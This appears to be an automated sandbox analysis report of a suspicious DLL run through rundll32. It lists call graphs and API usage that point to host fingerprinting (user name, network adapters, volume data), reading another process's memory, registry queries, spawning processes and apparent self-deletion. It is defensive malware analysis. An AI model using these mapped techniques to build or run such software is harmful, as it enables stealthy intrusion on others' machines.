7ffb1e86ad34 NtAllocateVirtualMemory 3597 7ffb1e86369f 3596->3597 3598 7ffb1e863703 ExitProcess 3597->3598 3599 7ffb1e86ba98 3 API calls 3597->3599 3600 7ffb1e8636be 3599->3600 3601 7ffb1e8636ea 3600->3601 3602 7ffb1e86ba98 3 API calls 3600->3602 3936 7ffb1e86b400 3601->3936 3604 7ffb1e8636d8 3602->3604 3606 7ffb1e86ba98 3 API calls 3604->3606 3606->3601 3607 7ffb1e867b40 NtFreeVirtualMemory 3607->3598 3609 7ffb1e863a11 3608->3609 3609->3438 3611 7ffb1e86ab86 3610->3611 3612 7ffb1e86ab7c 3611->3612 3613 7ffb1e866343 3611->3613 3612->3611 3633 7ffb1e86869c 3612->3633 3613->3471 3615 7ffb1e869484 3613->3615 3616 7ffb1e86a2eb 3615->3616 3618 7ffb1e86634c 3616->3618 3619 7ffb1e86a2e1 3616->3619 3617 7ffb1e86869c GetProcAddress 3617->3619 3618->3471 3621 7ffb1e86a47c 3618->3621 3619->3616 3619->3617 3620 7ffb1e86a33b 3619->3620 3620->3618 3624 7ffb1e86a53f 3621->3624 3622 7ffb1e866355 3622->3471 3625 7ffb1e86904c 3622->3625 3624->3622 3637 7ffb1e86a350 3624->3637 3628 7ffb1e869417 3625->3628 3626 7ffb1e86635e 3626->3471 3629 7ffb1e86ac50 3626->3629 3627 7ffb1e86869c GetProcAddress 3627->3628 3628->3626 3628->3627 3632 7ffb1e86acc1 3629->3632 3630 7ffb1e86ad1e 3630->3471 3631 7ffb1e86869c GetProcAddress 3631->3632 3632->3630 3632->3631 3634 7ffb1e8686b6 3633->3634 3635 7ffb1e8686bd 3633->3635 3634->3612 3635->3634 3636 7ffb1e8687a7 GetProcAddress 3635->3636 3636->3634 3649 7ffb1e868a94 3637->3649 3639 7ffb1e86a36d 3639->3624 3640 7ffb1e86a360 3640->3639 3655 7ffb1e86ba98 3640->3655 3642 7ffb1e86a3af 3642->3639 3643 7ffb1e86a3d5 FindFirstFileW 3642->3643 3644 7ffb1e86a413 3643->3644 3645 7ffb1e86a3f5 3643->3645 3659 7ffb1e867b40 3644->3659 3645->3644 3647 7ffb1e86a3fc FindNextFileW 3645->3647 3648 7ffb1e86a44e LoadLibraryW 3645->3648 3647->3644 3647->3645 3648->3644 3662 7ffb1e86ae1c 3649->3662 3652 7ffb1e868abe 3664 7ffb1e86bb2c 3652->3664 3653 7ffb1e868ad4 3653->3640 3656 7ffb1e86bab0 3655->3656 3669 7ffb1e86ba2c 3656->3669 3658 7ffb1e86bad9 3658->3642 3660 7ffb1e867b7b 3659->3660 3661 7ffb1e867b5a NtFreeVirtualMemory 3659->3661 3660->3639 3661->3660 3663 7ffb1e868aaa GetSystemDirectoryW 3662->3663 3663->3652 3663->3653 3667 7ffb1e86ad34 NtAllocateVirtualMemory 3664->3667 3666 7ffb1e86bb54 3666->3653 3668 7ffb1e86ad74 3667->3668 3668->3666 3672 7ffb1e86b058 3669->3672 3671 7ffb1e86ba60 3671->3658 3673 7ffb1e86b06c 3672->3673 3674 7ffb1e86b087 3672->3674 3676 7ffb1e867b40 NtFreeVirtualMemory 3673->3676 3678 7ffb1e86af9c 3674->3678 3677 7ffb1e86b079 3676->3677 3677->3671 3679 7ffb1e86afc3 3678->3679 3681 7ffb1e86afcd 3678->3681 3686 7ffb1e86addc 3679->3686 3682 7ffb1e86ad34 NtAllocateVirtualMemory 3681->3682 3685 7ffb1e86afec 3681->3685 3682->3685 3683 7ffb1e867b40 NtFreeVirtualMemory 3684 7ffb1e86aff9 3683->3684 3684->3677 3685->3683 3685->3684 3687 7ffb1e86adf1 VirtualQuery 3686->3687 3688 7ffb1e86aded 3686->3688 3687->3688 3688->3681 3714 7ffb1e8689d4 3689->3714 3694 7ffb1e868ae0 3695 7ffb1e86ae1c 3694->3695 3696 7ffb1e868afe GetUserNameA 3695->3696 3697 7ffb1e868b12 wsprintfA 3696->3697 3698 7ffb1e868b2b 3696->3698 3697->3698 3698->3507 3701 7ffb1e868437 3699->3701 3700 7ffb1e86ad34 NtAllocateVirtualMemory 3700->3701 3701->3700 3702 7ffb1e868496 3701->3702 3703 7ffb1e868453 GetModuleFileNameW 3701->3703 3704 7ffb1e8684a5 3702->3704 3706 7ffb1e867b40 NtFreeVirtualMemory 3702->3706 3703->3702 3707 7ffb1e868473 3703->3707 3704->3507 3705 7ffb1e867b40 NtFreeVirtualMemory 3705->3707 3706->3704 3707->3701 3707->3702 3707->3705 3709 7ffb1e864c52 3708->3709 3710 7ffb1e864c46 3708->3710 3712 7ffb1e864c5c CloseHandle 3709->3712 3713 7ffb1e864c69 3709->3713 3711 7ffb1e867b40 NtFreeVirtualMemory 3710->3711 3711->3709 3712->3713 3713->3499 3715 7ffb1e8689f2 3714->3715 3716 7ffb1e868a04 FindFirstVolumeW 3715->3716 3717 7ffb1e867b89 3716->3717 3718 7ffb1e868a25 GetVolumeInformationW FindVolumeClose 3716->3718 3719 7ffb1e868bbc 3717->3719 3718->3717 3720 7ffb1e868be5 3719->3720 3729 7ffb1e868d4c 3720->3729 3722 7ffb1e864684 3722->3694 3724 7ffb1e86ad34 NtAllocateVirtualMemory 3725 7ffb1e868c07 3724->3725 3726 7ffb1e868c35 3725->3726 3734 7ffb1e86b984 3725->3734 3728 7ffb1e867b40 NtFreeVirtualMemory 3726->3728 3728->3722 3730 7ffb1e86ad34 NtAllocateVirtualMemory 3729->3730 3731 7ffb1e868d68 3730->3731 3732 7ffb1e868bef 3731->3732 3738 7ffb1e868c4c 3731->3738 3732->3722 3732->3724 3735 7ffb1e86b99c 3734->3735 3741 7ffb1e86b9cc 3735->3741 3737 7ffb1e86b9c5 3737->3726 3739 7ffb1e868c6e 3738->3739 3740 7ffb1e868c89 wsprintfA 3739->3740 3740->3732 3742 7ffb1e86b058 3 API calls 3741->3742 3743 7ffb1e86b9fb 3742->3743 3743->3737 3745 7ffb1e86ad34 NtAllocateVirtualMemory 3744->3745 3746 7ffb1e86bafc 3745->3746 3746->3520 3782 7ffb1e8630d0 3747->3782 3749 7ffb1e86ceb9 3750 7ffb1e86ba98 3 API calls 3749->3750 3751 7ffb1e86cec6 3749->3751 3750->3751 3751->3530 3752 7ffb1e866b9c 3751->3752 3855 7ffb1e868fe8 3752->3855 3755 7ffb1e86ba98 3 API calls 3756 7ffb1e866bd7 3755->3756 3757 7ffb1e866c12 3756->3757 3758 7ffb1e86ba98 3 API calls 3756->3758 3760 7ffb1e867b40 NtFreeVirtualMemory 3757->3760 3763 7ffb1e866bbf 3757->3763 3759 7ffb1e866bed 3758->3759 3759->3757 3761 7ffb1e866bf1 3759->3761 3760->3763 3762 7ffb1e867b40 NtFreeVirtualMemory 3761->3762 3762->3763 3763->3540 3860 7ffb1e8677b0 3764->3860 3767 7ffb1e867a02 3767->3540 3774 7ffb1e86ccd8 3772->3774 3773 7ffb1e86ad34 NtAllocateVirtualMemory 3775 7ffb1e86cd3f 3773->3775 3774->3773 3780 7ffb1e86cd0f 3774->3780 3776 7ffb1e86bae0 NtAllocateVirtualMemory 3775->3776 3775->3780 3777 7ffb1e86cd71 3776->3777 3778 7ffb1e86ad34 NtAllocateVirtualMemory 3777->3778 3779 7ffb1e86cd90 3778->3779 3779->3780 3781 7ffb1e867b40 NtFreeVirtualMemory 3779->3781 3780->3540 3781->3780 3783 7ffb1e8689d4 3 API calls 3782->3783 3784 7ffb1e8630f6 3783->3784 3795 7ffb1e863194 3784->3795 3787 7ffb1e86310b 3787->3749 3789 7ffb1e867b40 NtFreeVirtualMemory 3791 7ffb1e86316c 3789->3791 3790 7ffb1e863116 3793 7ffb1e86ba98 3 API calls 3790->3793 3794 7ffb1e86315e 3790->3794 3791->3787 3792 7ffb1e867b40 NtFreeVirtualMemory 3791->3792 3792->3787 3793->3794 3794->3789 3796 7ffb1e8631d6 3795->3796 3797 7ffb1e863215 wsprintfW 3796->3797 3798 7ffb1e8630fe 3797->3798 3799 7ffb1e863235 3797->3799 3798->3787 3801 7ffb1e867b98 3798->3801 3800 7ffb1e86bb2c NtAllocateVirtualMemory 3799->3800 3800->3798 3802 7ffb1e867bb5 3801->3802 3808 7ffb1e867bbf 3802->3808 3809 7ffb1e86b154 3802->3809 3804 7ffb1e867e42 3805 7ffb1e86ba98 3 API calls 3804->3805 3804->3808 3806 7ffb1e867e65 3805->3806 3807 7ffb1e867b40 NtFreeVirtualMemory 3806->3807 3806->3808 3807->3808 3808->3790 3818 7ffb1e8688f8 3809->3818 3812 7ffb1e86ba98 3 API calls 3814 7ffb1e86b1a5 3812->3814 3813 7ffb1e86b192 3813->3804 3815 7ffb1e86b1bd 3814->3815 3830 7ffb1e86b1d4 3814->3830 3817 7ffb1e867b40 NtFreeVirtualMemory 3815->3817 3817->3813 3819 7ffb1e86895b 3818->3819 3822 7ffb1e868916 3818->3822 3820 7ffb1e86896a RtlFormatCurrentUserKeyPath 3819->3820 3821 7ffb1e868979 3820->3821 3826 7ffb1e868951 3820->3826 3823 7ffb1e86ba98 3 API calls 3821->3823 3824 7ffb1e86ba98 3 API calls 3822->3824 3823->3826 3824->3826 3825 7ffb1e868955 3825->3812 3825->3813 3826->3825 3827 7ffb1e86ba98 3 API calls 3826->3827 3828 7ffb1e8689af 3827->3828 3828->3825 3829 7ffb1e867b40 NtFreeVirtualMemory 3828->3829 3829->3825 3846 7ffb1e86bf4c 3830->3846 3833 7ffb1e86b20d 3833->3815 3835 7ffb1e86b22c 3835->3833 3836 7ffb1e86b246 NtQueryValueKey 3835->3836 3836->3833 3837 7ffb1e86b27e 3836->3837 3838 7ffb1e86ad34 NtAllocateVirtualMemory 3837->3838 3839 7ffb1e86b289 3838->3839 3840 7ffb1e86b32f NtClose 3839->3840 3841 7ffb1e86b29a NtQueryValueKey 3839->3841 3840->3833 3842 7ffb1e86b2cb 3841->3842 3843 7ffb1e86b2df 3841->3843 3845 7ffb1e86ad34 NtAllocateVirtualMemory 3842->3845 3844 7ffb1e867b40 NtFreeVirtualMemory 3843->3844 3844->3840 3845->3843 3847 7ffb1e86bf66 3846->3847 3849 7ffb1e86b209 3846->3849 3848 7ffb1e86bb2c NtAllocateVirtualMemory 3847->3848 3848->3849 3849->3833 3850 7ffb1e86b0c4 3849->3850 3851 7ffb1e86bf4c NtAllocateVirtualMemory 3850->3851 3852 7ffb1e86b0f1 3851->3852 3853 7ffb1e86b108 RtlpNtOpenKey 3852->3853 3854 7ffb1e86b0f5 3852->3854 3853->3854 3854->3835 3856 7ffb1e86bb2c NtAllocateVirtualMemory 3855->3856 3858 7ffb1e869008 3856->3858 3857 7ffb1e866bbb 3857->3755 3857->3763 3858->3857 3859 7ffb1e867b40 NtFreeVirtualMemory 3858->3859 3859->3857 3861 7ffb1e8677f1 3860->3861 3862 7ffb1e867803 RtlInitUnicodeString NtCreateFile 3861->3862 3863 7ffb1e8678a9 3862->3863 3863->3767 3864 7ffb1e867768 3863->3864 3872 7ffb1e867704 3864->3872 3867 7ffb1e8678c0 3868 7ffb1e86ad34 NtAllocateVirtualMemory 3867->3868 3869 7ffb1e86793a 3868->3869 3870 7ffb1e867957 NtReadFile 3869->3870 3871 7ffb1e867953 NtClose 3869->3871 3870->3871 3871->3767 3873 7ffb1e867721 3872->3873 3874 7ffb1e867730 NtQueryInformationFile 3873->3874 3875 7ffb1e867757 3874->3875 3875->3767 3875->3867 3877 7ffb1e8689d4 3 API calls 3876->3877 3878 7ffb1e863276 3877->3878 3879 7ffb1e863194 2 API calls 3878->3879 3880 7ffb1e86327e 3879->3880 3881 7ffb1e8630d0 12 API calls 3880->3881 3887 7ffb1e86328b 3880->3887 3882 7ffb1e863318 3881->3882 3884 7ffb1e86ba98 3 API calls 3882->3884 3892 7ffb1e86335c 3882->3892 3883 7ffb1e867b40 NtFreeVirtualMemory 3885 7ffb1e863384 3883->3885 3886 7ffb1e863336 3884->3886 3885->3887 3888 7ffb1e867b40 NtFreeVirtualMemory 3885->3888 3889 7ffb1e86ba98 3 API calls 3886->3889 3886->3892 3887->3545 3887->3546 3888->3887 3890 7ffb1e863349 3889->3890 3891 7ffb1e86ba98 3 API calls 3890->3891 3890->3892 3891->3892 3892->3883 3894 7ffb1e8675ae 3893->3894 3895 7ffb1e8675c0 RtlInitUnicodeString 3894->3895 3941 7ffb1e867414 GetFileAttributesW 3895->3941 3898 7ffb1e86760e NtCreateFile 3899 7ffb1e86345a 3898->3899 3900 7ffb1e867673 NtClose 3898->3900 3899->3565 3899->3566 3900->3899 3902 7ffb1e8679c8 6 API calls 3901->3902 3903 7ffb1e867533 3902->3903 3906 7ffb1e867537 3903->3906 3943 7ffb1e867acc 3903->3943 3906->3573 3907 7ffb1e867572 3910 7ffb1e867b40 NtFreeVirtualMemory 3907->3910 3908 7ffb1e867568 3949 7ffb1e867694 3908->3949 3910->3906 3912 7ffb1e868ae0 2 API calls 3911->3912 3913 7ffb1e863762 3912->3913 3955 7ffb1e866298 3913->3955 3915 7ffb1e86376a 3915->3585 3917 7ffb1e863c4f 3916->3917 3918 7ffb1e863c42 SetEvent 3916->3918 3919 7ffb1e863c59 ReleaseMutex FindCloseChangeNotification 3917->3919 3920 7ffb1e863690 3917->3920 3918->3917 3919->3920 3921 7ffb1e863a24 3920->3921 3922 7ffb1e863a42 CreateFileW 3921->3922 3926 7ffb1e863695 3921->3926 3923 7ffb1e863a8a 3922->3923 3922->3926 3924 7ffb1e86ad34 NtAllocateVirtualMemory 3923->3924 3925 7ffb1e863af5 3924->3925 3925->3926 3927 7ffb1e863b1b SetFileInformationByHandle 3925->3927 3926->3596 3928 7ffb1e863b7b 3927->3928 3929 7ffb1e863b67 3927->3929 3931 7ffb1e867b40 NtFreeVirtualMemory 3928->3931 3930 7ffb1e867b40 NtFreeVirtualMemory 3929->3930 3930->3926 3932 7ffb1e863b85 FindCloseChangeNotification CreateFileW 3931->3932 3932->3926 3933 7ffb1e863bd5 3932->3933 3934 7ffb1e863be9 SetFileInformationByHandle 3933->3934 3934->3926 3935 7ffb1e863c14 CloseHandle 3934->3935 3935->3926 3937 7ffb1e86b41a 3936->3937 3938 7ffb1e86b452 CreateProcessW 3937->3938 3939 7ffb1e8636f9 3938->3939 3940 7ffb1e86b4a6 CloseHandle CloseHandle 3938->3940 3939->3607 3940->3939 3942 7ffb1e867439 3941->3942 3942->3898 3942->3899 3944 7ffb1e8677b0 2 API calls 3943->3944 3945 7ffb1e867b07 3944->3945 3946 7ffb1e867557 3945->3946 3953 7ffb1e867a54 NtWriteFile 3945->3953 3946->3906 3946->3907 3946->3908 3950 7ffb1e86ae1c 3949->3950 3951 7ffb1e8676b4 RtlInitUnicodeString NtDeleteFile 3950->3951 3952 7ffb1e8676f0 3951->3952 3952->3907 3954 7ffb1e867abc NtClose 3953->3954 3954->3946 3956 7ffb1e8662b4 3955->3956 3957 7ffb1e86ad34 NtAllocateVirtualMemory 3956->3957 3958 7ffb1e8662c9 3957->3958 3959 7ffb1e8662d6 3958->3959 3960 7ffb1e8662f0 MultiByteToWideChar 3958->3960 3959->3915 3960->3959

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 0 7ffb1e86463c-7ffb1e8646b9 GetModuleHandleW GetCurrentProcessId call 7ffb1e867b80 call 7ffb1e868ae0 call 7ffb1e86ae78 7 7ffb1e8646bb-7ffb1e8646cb 0->7 8 7ffb1e8646cd-7ffb1e8646d5 0->8 9 7ffb1e8646dd-7ffb1e86470b call 7ffb1e86bc1c call 7ffb1e86c99c 7->9 8->9 14 7ffb1e864711-7ffb1e86471d 9->14 15 7ffb1e86471f-7ffb1e86472f call 7ffb1e868560 call 7ffb1e868fe0 14->15 16 7ffb1e864735-7ffb1e864741 14->16 15->16 17 7ffb1e86474f-7ffb1e86475b 16->17 18 7ffb1e864743-7ffb1e864749 GetCurrentProcessId 16->18 20 7ffb1e864b32-7ffb1e864b36 17->20 21 7ffb1e864761-7ffb1e864769 17->21 18->17 20->14 25 7ffb1e864b3c-7ffb1e864b44 20->25 23 7ffb1e86476b-7ffb1e86477c call 7ffb1e86841c 21->23 24 7ffb1e86478d-7ffb1e8647ae GetCurrentProcessId OpenProcess 21->24 35 7ffb1e864781-7ffb1e864783 23->35 24->20 29 7ffb1e8647b4-7ffb1e864815 NtQueryInformationProcess 24->29 30 7ffb1e864c1c-7ffb1e864c21 25->30 31 7ffb1e864b4a-7ffb1e864b6c call 7ffb1e86bc64 call 7ffb1e86bb2c 25->31 36 7ffb1e86481b-7ffb1e864824 29->36 37 7ffb1e864b27-7ffb1e864b2c FindCloseChangeNotification 29->37 33 7ffb1e864c28-7ffb1e864c34 30->33 34 7ffb1e864c23 call 7ffb1e864c38 30->34 44 7ffb1e864b71-7ffb1e864b82 31->44 34->33 35->24 40 7ffb1e864785 35->40 36->37 41 7ffb1e86482a-7ffb1e86487b ReadProcessMemory 36->41 37->20 40->24 41->37 43 7ffb1e864881-7ffb1e8648d5 ReadProcessMemory 41->43 43->37 45 7ffb1e8648db-7ffb1e8648e5 43->45 46 7ffb1e864b88-7ffb1e864b9f call 7ffb1e86ae78 44->46 47 7ffb1e864c14 44->47 45->37 48 7ffb1e8648eb-7ffb1e864999 call 7ffb1e86ad34 WideCharToMultiByte call 7ffb1e86bfcc * 2 45->48 54 7ffb1e864ba1-7ffb1e864bb1 46->54 55 7ffb1e864bb3-7ffb1e864bbb 46->55 47->30 62 7ffb1e86499b-7ffb1e8649d2 call 7ffb1e86bfcc 48->62 63 7ffb1e8649f4-7ffb1e8649fa 48->63 57 7ffb1e864bc3-7ffb1e864be7 call 7ffb1e86beb0 call 7ffb1e86b900 54->57 55->57 72 7ffb1e864be9-7ffb1e864bf1 57->72 73 7ffb1e864bf3 57->73 62->63 76 7ffb1e8649d4-7ffb1e8649ef call 7ffb1e86bfcc 62->76 66 7ffb1e864a1c-7ffb1e864a53 call 7ffb1e866298 * 2 63->66 67 7ffb1e8649fc-7ffb1e864a17 call 7ffb1e86bfcc 63->67 84 7ffb1e864a59 66->84 85 7ffb1e864b04-7ffb1e864b09 66->85 67->66 74 7ffb1e864bfb-7ffb1e864c12 call 7ffb1e867b40 72->74 73->74 74->30 76->63 86 7ffb1e864a62-7ffb1e864a7e call 7ffb1e86bd7c 84->86 87 7ffb1e864b0b-7ffb1e864b13 85->87 88 7ffb1e864b1d-7ffb1e864b22 call 7ffb1e867b40 85->88 93 7ffb1e864a80-7ffb1e864aaa call 7ffb1e86bc1c call 7ffb1e86ad90 86->93 94 7ffb1e864aac-7ffb1e864ac1 86->94 87->88 90 7ffb1e864b15 87->90 88->37 90->88 93->86 96 7ffb1e864af3-7ffb1e864afd call 7ffb1e866298 94->96 97 7ffb1e864ac3-7ffb1e864af1 call 7ffb1e86bc1c call 7ffb1e866298 94->97 96->85 97->85
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.1295006377.00007FFB1E861000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FFB1E860000, based on PE: true
                          • Associated: 00000003.00000002.1294990389.00007FFB1E860000.00000002.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295022801.00007FFB1E86E000.00000002.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295035984.00007FFB1E86F000.00000008.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295051153.00007FFB1E870000.00000004.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295065886.00007FFB1E872000.00000002.00000001.01000000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ffb1e860000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process$CurrentMemory$Read$AllocateByteChangeCharCloseFindHandleInformationModuleMultiNameNotificationOpenQueryUserVirtualWidewsprintf
                          • String ID:
                          • API String ID: 2225485709-0
                          • Opcode ID: 553234ae9dc6a36e004ee84dabc2d8032e1e0f5a123dc47589713fb678979b24
                          • Instruction ID: 1404e84d57899f2f3c92aaaa7fd7e93b5047b60314454e43783a053fd6d55051
                          • Opcode Fuzzy Hash: 553234ae9dc6a36e004ee84dabc2d8032e1e0f5a123dc47589713fb678979b24
                          • Instruction Fuzzy Hash: 35F10DB190DE8685E760DB25E4543AAB3A2FB88768F500135D68D87BA9DF7CF485CB00

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.1295006377.00007FFB1E861000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FFB1E860000, based on PE: true
                          • Associated: 00000003.00000002.1294990389.00007FFB1E860000.00000002.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295022801.00007FFB1E86E000.00000002.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295035984.00007FFB1E86F000.00000008.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295051153.00007FFB1E870000.00000004.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295065886.00007FFB1E872000.00000002.00000001.01000000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ffb1e860000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$AttributesCloseCreateInitStringUnicode
                          • String ID: 0$@
                          • API String ID: 2504508917-1545510068
                          • Opcode ID: 76083a2609edba1498485c59019560715fe1d99402632d84a6ddf28b8a5ccd31
                          • Instruction ID: 1da0aeeb5004f3638d751f72afca8d0fa8e31dd22af9ef9968a2154a041c8746
                          • Opcode Fuzzy Hash: 76083a2609edba1498485c59019560715fe1d99402632d84a6ddf28b8a5ccd31
                          • Instruction Fuzzy Hash: A921F4B2518A8187E7609F20E4543ABB7A1F7C4358F504135E6CD87AA9DF7DE849CF80

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.1295006377.00007FFB1E861000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FFB1E860000, based on PE: true
                          • Associated: 00000003.00000002.1294990389.00007FFB1E860000.00000002.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295022801.00007FFB1E86E000.00000002.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295035984.00007FFB1E86F000.00000008.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295051153.00007FFB1E870000.00000004.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295065886.00007FFB1E872000.00000002.00000001.01000000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ffb1e860000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: CreateFileInitStringUnicode
                          • String ID: 0$@
                          • API String ID: 2498367268-1545510068
                          • Opcode ID: 04c235c605806e9dc8f2c28b84d8f7d6f4de585734f90aa2da62749025ce9b27
                          • Instruction ID: e18a929870fb0d08a56a02e645c20a841475936f945756d3edc70157719a2222
                          • Opcode Fuzzy Hash: 04c235c605806e9dc8f2c28b84d8f7d6f4de585734f90aa2da62749025ce9b27
                          • Instruction Fuzzy Hash: A121BFB2508B8586E760DF14F45478AB7A1F384368F508229E2D987AA8CB7DE549CF40

                          Control-flow Graph

                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.1295006377.00007FFB1E861000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FFB1E860000, based on PE: true
                          • Associated: 00000003.00000002.1294990389.00007FFB1E860000.00000002.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295022801.00007FFB1E86E000.00000002.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295035984.00007FFB1E86F000.00000008.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295051153.00007FFB1E870000.00000004.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295065886.00007FFB1E872000.00000002.00000001.01000000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ffb1e860000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32
                          • String ID:
                          • API String ID: 3243318325-0
                          • Opcode ID: 2dc8fd6175d5f81b5a57fe4cd961050eae0e2aeff7595481171681c6ca23b914
                          • Instruction ID: de284baaa7c068cbcd57ad0ca19d6135d090268552c68b83ee7e72f3af147bb1
                          • Opcode Fuzzy Hash: 2dc8fd6175d5f81b5a57fe4cd961050eae0e2aeff7595481171681c6ca23b914
                          • Instruction Fuzzy Hash: 9D0167B6A18E41C3E7A0CB21E45472AB761FBC8758F440231E58D86658DF3CE606CB00

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.1295006377.00007FFB1E861000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FFB1E860000, based on PE: true
                          • Associated: 00000003.00000002.1294990389.00007FFB1E860000.00000002.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295022801.00007FFB1E86E000.00000002.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295035984.00007FFB1E86F000.00000008.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295051153.00007FFB1E870000.00000004.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295065886.00007FFB1E872000.00000002.00000001.01000000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ffb1e860000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: AdaptersInfo$AllocateMemoryVirtual
                          • String ID: o
                          • API String ID: 2718687846-252678980
                          • Opcode ID: ac2f8d3fbbc935a6ac9d463d0bbea8ea32726beb64fb5b3c282bee4d6846076f
                          • Instruction ID: 7a81f8c3e8e66fe91086413bb0845561ce88b7f67977d6cf383c4164c8a30e23
                          • Opcode Fuzzy Hash: ac2f8d3fbbc935a6ac9d463d0bbea8ea32726beb64fb5b3c282bee4d6846076f
                          • Instruction Fuzzy Hash: 8F11E8B6908B4186E7709B25E04436AB7A1F78C7A8F440235EA8D46B68DF7CE685CF04

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.1295006377.00007FFB1E861000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FFB1E860000, based on PE: true
                          • Associated: 00000003.00000002.1294990389.00007FFB1E860000.00000002.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295022801.00007FFB1E86E000.00000002.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295035984.00007FFB1E86F000.00000008.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295051153.00007FFB1E870000.00000004.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295065886.00007FFB1E872000.00000002.00000001.01000000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ffb1e860000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: NameUserwsprintf
                          • String ID: frontdesk
                          • API String ID: 54179028-1081972030
                          • Opcode ID: 00ea61a6f36f2d287cf2ddfa281af9f578b78246b28b81e2290f27616a54ea60
                          • Instruction ID: 3ca426c39de4e6c1eb056999b03bda9de25eccbf62095ebfbc1a5a42c6a85db3
                          • Opcode Fuzzy Hash: 00ea61a6f36f2d287cf2ddfa281af9f578b78246b28b81e2290f27616a54ea60
                          • Instruction Fuzzy Hash: 39F0ACA5A28D8392EB50AB20E8503B96362FF84754FC01031E14D565A5DF7CF60ADB40

                          Control-flow Graph

                          Memory Dump Source
                          • Source File: 00000003.00000002.1295006377.00007FFB1E861000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FFB1E860000, based on PE: true
                          • Associated: 00000003.00000002.1294990389.00007FFB1E860000.00000002.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295022801.00007FFB1E86E000.00000002.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295035984.00007FFB1E86F000.00000008.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295051153.00007FFB1E870000.00000004.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295065886.00007FFB1E872000.00000002.00000001.01000000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ffb1e860000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 82f5dfc0f4c93d1b3f6d502baa400a5d304553604fd23427375f6b58881a359c
                          • Instruction ID: dc07f5a4a7186b1e37cd5725b4c15f64c72565385e028c2e07ee8a556ae8c204
                          • Opcode Fuzzy Hash: 82f5dfc0f4c93d1b3f6d502baa400a5d304553604fd23427375f6b58881a359c
                          • Instruction Fuzzy Hash: ED413D72629A8186D750DF25E48076EB7A1FBC8798F505035FA8E83B69DF3CE945CB00

                          Control-flow Graph

                          Memory Dump Source
                          • Source File: 00000003.00000002.1295006377.00007FFB1E861000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FFB1E860000, based on PE: true
                          • Associated: 00000003.00000002.1294990389.00007FFB1E860000.00000002.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295022801.00007FFB1E86E000.00000002.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295035984.00007FFB1E86F000.00000008.00000001.01000000.00000000.sdmpDownload File
